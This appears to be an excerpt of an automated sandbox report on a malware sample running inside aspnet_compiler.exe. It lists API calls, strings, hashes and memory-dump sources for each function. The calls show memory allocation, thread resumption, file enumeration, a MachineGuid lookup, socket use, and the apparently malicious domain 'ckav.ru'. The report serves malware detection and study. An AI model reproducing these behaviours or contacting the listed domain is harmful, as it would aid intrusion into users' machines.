Source File: 00000002.00000002.2280041172.0000000004950000.00000040.00000800.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4950000_x.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: c3cc3e1b130938bb48c7b282333a1dbe5570d13420ca8f78f834840856ddf229
Instruction ID: 1c4ab7a09fd7acd23b07c769912c5a3e8aba70149c96accdf873e1a63533b4e9
Opcode Fuzzy Hash: c3cc3e1b130938bb48c7b282333a1dbe5570d13420ca8f78f834840856ddf229
Instruction Fuzzy Hash: 712199B8D002199FCB10CFA9D584ADEFBF4BB49320F24906AE918B7310D375A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0070F0C8 Relevance: 1.3, APIs: 1, Instructions: 94
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 0070F167

Memory Dump Source

Source File: 00000002.00000002.2277097619.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_700000_x.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 93c93bdd447110efe42c004f38d46f4cd04f80af2a1924e7f5c079d53b279125
Instruction ID: ca3e0ac20cc0009e9179b285de482ce9cab396c36874f5234bc98e4b5d697075
Opcode Fuzzy Hash: 93c93bdd447110efe42c004f38d46f4cd04f80af2a1924e7f5c079d53b279125
Instruction Fuzzy Hash: 333198B9D01258DFDF10CFA9D980A9EFBB1BF49310F24942AE814B7210D739A945CF98

Uniqueness

Uniqueness Score: -1.00%

Function 006AD01C Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276979153.00000000006AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6ad000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a98a018828f32d88dee648ea2d686a070767912d06288317320eaf885d63b7a
Instruction ID: 17550b6810f09d33ed4c66bc58f839e545faddec6324dff0ba83c0642378bf2a
Opcode Fuzzy Hash: 2a98a018828f32d88dee648ea2d686a070767912d06288317320eaf885d63b7a
Instruction Fuzzy Hash: 02212271104244DFDB10EF14D9C4B26BBA6FB89314F208569E90A4B742C336DC4BCFA2

Uniqueness

Uniqueness Score: -1.00%

Function 006AD104 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276979153.00000000006AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6ad000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b9c9ddbd0d257bc51137d3d6756a33c49f4bb600b8c15afd20c52d71809a847
Instruction ID: aecb73c73c188a09cc5117feb8a5beff174cda5ecbe6d40dd2569f9da469a171
Opcode Fuzzy Hash: 8b9c9ddbd0d257bc51137d3d6756a33c49f4bb600b8c15afd20c52d71809a847
Instruction Fuzzy Hash: F221F6B1644240EFDB04EF14D980B16BBA6FB85718F20C96DD80A4B791C336DC4BCE61

Uniqueness

Uniqueness Score: -1.00%

Function 006AD006 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276979153.00000000006AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6ad000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58b5753ba848c3ee01b20ec167095d01995965029b6d51df78447ec1c65ac814
Instruction ID: 1d4dfb63d7788424ff8ef9fe7ec29c9a55bd46a4e4639f66b8c8a882d403a5dc
Opcode Fuzzy Hash: 58b5753ba848c3ee01b20ec167095d01995965029b6d51df78447ec1c65ac814
Instruction Fuzzy Hash: B02180715083809FCB02DF14D994B56BF72EB86314F2985DAD8458F697C33A9C1ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 006AD0FF Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2276979153.00000000006AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 006AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6ad000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33e330166665ebd0cfd0a235bce6a45b074b869f388cde929a169c887396a6bf
Instruction ID: a630722da7b4463960961c5cb9186279c7816c02d56d93941507816d4a4bc137
Opcode Fuzzy Hash: 33e330166665ebd0cfd0a235bce6a45b074b869f388cde929a169c887396a6bf
Instruction Fuzzy Hash: 68119D755042808FDB05EF10D984B55BBA2FB85318F24CAA9D84A4BB52C33ADC0ACF51

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00700C90 Relevance: 2.7, Strings: 2, Instructions: 167COMMON

Download Yara Rule

Strings

D@j, xrefs: 00700EA7
\Uj, xrefs: 00700D15

Memory Dump Source

Source File: 00000002.00000002.2277097619.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_700000_x.jbxd

Similarity

API ID:
String ID: D@j$\Uj
API String ID: 0-3517916542
Opcode ID: abf7d00184cee145a88a992ac57d99973adf6fa0fa2052307b2e7c0def248843
Instruction ID: ac172e96dd888f016c88cbda49d8b98f313b1a9f628aab3d43dc67f80b84a497
Opcode Fuzzy Hash: abf7d00184cee145a88a992ac57d99973adf6fa0fa2052307b2e7c0def248843
Instruction Fuzzy Hash: 79612E74A016498FDB48EF7AE88069ABBF7BBC9300F14D52DD0149B369DF7499068F90

Uniqueness

Uniqueness Score: -1.00%

Function 00700CA0 Relevance: 2.7, Strings: 2, Instructions: 160COMMON

Download Yara Rule

Strings

D@j, xrefs: 00700EA7
\Uj, xrefs: 00700D15

Memory Dump Source

Source File: 00000002.00000002.2277097619.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_700000_x.jbxd

Similarity

API ID:
String ID: D@j$\Uj
API String ID: 0-3517916542
Opcode ID: 8e6af73ecc4dab174d4770da9d9818871a3571b8d5b0246447bc88db1fd3ff80
Instruction ID: a2327f92ec9c33e8637b4f2ddb79ba3d28514155c68e979cfa30132544daa0b5
Opcode Fuzzy Hash: 8e6af73ecc4dab174d4770da9d9818871a3571b8d5b0246447bc88db1fd3ff80
Instruction Fuzzy Hash: CF612E74A012498FDB48EF7AE88069ABBF7BBC9300F14D52DD01497369DF7899068F90

Uniqueness

Uniqueness Score: -1.00%

Function 04952940 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2280041172.0000000004950000.00000040.00000800.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9414118b66c25b5c80ce56b8d44ec0ec3e4c38ee0bb33ac702a3a1b8941aeb2c
Instruction ID: f6be8263dcb74d46c1d390bfb0d6b6ebfabbf90263333667ef5181885ee1ba9f
Opcode Fuzzy Hash: 9414118b66c25b5c80ce56b8d44ec0ec3e4c38ee0bb33ac702a3a1b8941aeb2c
Instruction Fuzzy Hash: 0E610A74A002458FDB58EFAAE891699BBF7FBCA300F14D52DD0049B369DB74A9068F50

Uniqueness

Uniqueness Score: -1.00%

Function 0495A160 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2280041172.0000000004950000.00000040.00000800.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d61117ed0113ba8fcdef25bd7c8c31e4b5e4c9e2196aacc2352e390a614ffe08
Instruction ID: e364ea2b6fe815eff54845ca116d775641348056e726f8c0c89044629e962562
Opcode Fuzzy Hash: d61117ed0113ba8fcdef25bd7c8c31e4b5e4c9e2196aacc2352e390a614ffe08
Instruction Fuzzy Hash: 7F51E070E00258DFDB14CFA9D885B9EBBB1BF49304F20912AE815AB260DB75A845CF49

Uniqueness

Uniqueness Score: -1.00%

Function 0495AAA8 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2280041172.0000000004950000.00000040.00000800.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f05f7c63dfce593c6551d9e3618b33455ccda91ef597687ceb0f22f481f7af33
Instruction ID: f40f9d81bcb62ddcbde1f05cf6288b32c2adccab692e2351e291f7a67800f123
Opcode Fuzzy Hash: f05f7c63dfce593c6551d9e3618b33455ccda91ef597687ceb0f22f481f7af33
Instruction Fuzzy Hash: F451E270D002589FDB14DFA9D985B9EBBB2BB49700F20912AD815AB360DB74A845CF89

Uniqueness

Uniqueness Score: -1.00%

Function 0495AEE8 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2280041172.0000000004950000.00000040.00000800.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dafa5208ebd27c5a1315be61daab2a6ce00025c6cd1b40429f8f581700cffe34
Instruction ID: 08521dba77c29c18772dc44a8a759c36b1a2d16595960fc18b6d1d8364edf787
Opcode Fuzzy Hash: dafa5208ebd27c5a1315be61daab2a6ce00025c6cd1b40429f8f581700cffe34
Instruction Fuzzy Hash: C251EDB4D00258DFDB14DFA9C984BDEFBF1BB49300F20952AE815AB260DB74A885CF45

Uniqueness

Uniqueness Score: -1.00%

Function 00700F40 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2277097619.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_700000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a922537ccb16bffa96ab12c94908a378b60bf2deb6c374434e86988a629006c2
Instruction ID: 865a0e0ca0b6714def58819de2d587c60056d587a46a73c68982d189ec02c6f3
Opcode Fuzzy Hash: a922537ccb16bffa96ab12c94908a378b60bf2deb6c374434e86988a629006c2
Instruction Fuzzy Hash: A9515DB1D056588BEB28CF6B9D446CAFAF3AFC9300F54C1FA944CA6255EB700AC58E11

Uniqueness

Uniqueness Score: -1.00%

Function 0070096C Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2277097619.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_700000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc8fbaa54ee9b8bdab04a26f6c40de25ec7faa41104f1c698c71d4944c42728e
Instruction ID: 2a807cb2df21e80a8ecb05fb41f66783f61a6cf5bb955c9be87933a4cd142f81
Opcode Fuzzy Hash: fc8fbaa54ee9b8bdab04a26f6c40de25ec7faa41104f1c698c71d4944c42728e
Instruction Fuzzy Hash: 0F41EEB4E00348DFDB20CFE9D984B9EBBF1AB49710F20912AE415AB291D7789885CF44

Uniqueness

Uniqueness Score: -1.00%

Function 04952BE1 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2280041172.0000000004950000.00000040.00000800.00020000.00000000.sdmp, Offset: 04950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4950000_x.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8935735bf94d600d6b5725e5ff92211ce56a8563f9eef88f65e4ec4b761e3278
Instruction ID: 24057e3097b7730fa13bda4f112dc8c98f87b85abedf91384c74d6905e456919
Opcode Fuzzy Hash: 8935735bf94d600d6b5725e5ff92211ce56a8563f9eef88f65e4ec4b761e3278
Instruction Fuzzy Hash: 124143B1E016588BEB2CCF6B8D4078AFAF7AFC5200F14C1FAD54DAA265DB3119528F41

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: aspnet_compiler.exePID: 4596, Parent PID: 7020COMMON

Execution Graph

Execution Coverage:	30.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.3%
Total number of Nodes:	1844
Total number of Limit Nodes:	69

Executed Functions

Function 00403D74 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 200
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB

Strings

Program Files, xrefs: 00403E01
%s\%s, xrefs: 00403E3A, 00403EAF, 00403F1C
%s\*, xrefs: 00403D99
Windows, xrefs: 00403DEA

Memory Dump Source

Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: FileFindFirst
String ID: %s\%s$%s\*$Program Files$Windows
API String ID: 1974802433-2009209621
Opcode ID: ba89cf93251e39584731f3d6e5c053cf465788abbe1bca3e8a88947a019726ef
Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
Opcode Fuzzy Hash: ba89cf93251e39584731f3d6e5c053cf465788abbe1bca3e8a88947a019726ef
Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C

Uniqueness

Uniqueness Score: -1.00%

Function 00402B7C Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Uniqueness

Uniqueness Score: -1.00%

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Uniqueness

Uniqueness Score: -1.00%

Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261
GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C

Strings

IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B
IDA, xrefs: 00406304

Memory Dump Source

Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: _wmemset$ErrorInformationLastToken
String ID: IDA$IDA
API String ID: 487585393-2020647798
Opcode ID: 1f028961ec1ed3c75f428258fc75133e0b514cd312a430588f71e49b327cd99e
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: 1f028961ec1ed3c75f428258fc75133e0b514cd312a430588f71e49b327cd99e
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Uniqueness

Uniqueness Score: -1.00%

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: f3961944380a1dba1fed29402a4b94b30b75c90acdc8c1f36bcdbe15725494dc
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: f3961944380a1dba1fed29402a4b94b30b75c90acdc8c1f36bcdbe15725494dc
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Uniqueness

Uniqueness Score: -1.00%

Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A

Strings

.tmp, xrefs: 00404196

Memory Dump Source

Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: File$AllocCreateReadVirtual
String ID: .tmp
API String ID: 3585551309-2986845003
Opcode ID: f0b70a0fa2ce9f3aed2e2fb30e0a7af12988fdbd779b5d3696659e25893cc5c3
Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
Opcode Fuzzy Hash: f0b70a0fa2ce9f3aed2e2fb30e0a7af12988fdbd779b5d3696659e25893cc5c3
Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9

Uniqueness

Uniqueness Score: -1.00%

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Uniqueness

Uniqueness Score: -1.00%

Function 004042CF Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334

Memory Dump Source

Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: File$CreatePointerWrite
String ID:
API String ID: 3672724799-0
Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8

Uniqueness

Uniqueness Score: -1.00%

Function 00412D31 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53

Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F

Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
Part of subcall function 00402BAB: RtlFreeHeap.NTDLL(00000000), ref: 00402BC0

Strings

ckav.ru, xrefs: 00412D96

Memory Dump Source

Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Heap$CreateFreeProcessThread_wmemset
String ID: ckav.ru
API String ID: 2915393847-2696028687
Opcode ID: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
Opcode Fuzzy Hash: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED

Uniqueness

Uniqueness Score: -1.00%

Function 0040632F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

_wmemset.LIBCMT ref: 0040634F

Strings

CA, xrefs: 00406354, 0040635A

Memory Dump Source

Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess_wmemset
String ID: CA
API String ID: 2773065342-1052703068
Opcode ID: d67df391eaf52e7041b539f43b4c30e8bac4520f3636b6a15260aeb5ddb41f23
Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
Opcode Fuzzy Hash: d67df391eaf52e7041b539f43b4c30e8bac4520f3636b6a15260aeb5ddb41f23
Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD

Uniqueness

Uniqueness Score: -1.00%

Function 00406086 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8

Strings

IDA, xrefs: 00406086

Memory Dump Source

Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID: IDA
API String ID: 4114910276-365204570
Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95

Uniqueness

Uniqueness Score: -1.00%

Function 00402C03 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B

Strings

s1@, xrefs: 00402C15

Memory Dump Source

Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: s1@
API String ID: 190572456-427247929
Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4

Uniqueness

Uniqueness Score: -1.00%

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 00000004.00000002.3493958315.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: Heap$AllocateOpenProcessQueryValue
String ID:
API String ID: 1425999871-0
Opcode ID: 7b25cb1320f699495a3842f9950f6c7efed9fd97b6141ec9a7892f130df46c4f
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: 7b25cb1320f699495a3842f9950f6c7efed9fd97b6141ec9a7892f130df46c4f
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Uniqueness

Uniqueness Score: -1.00%

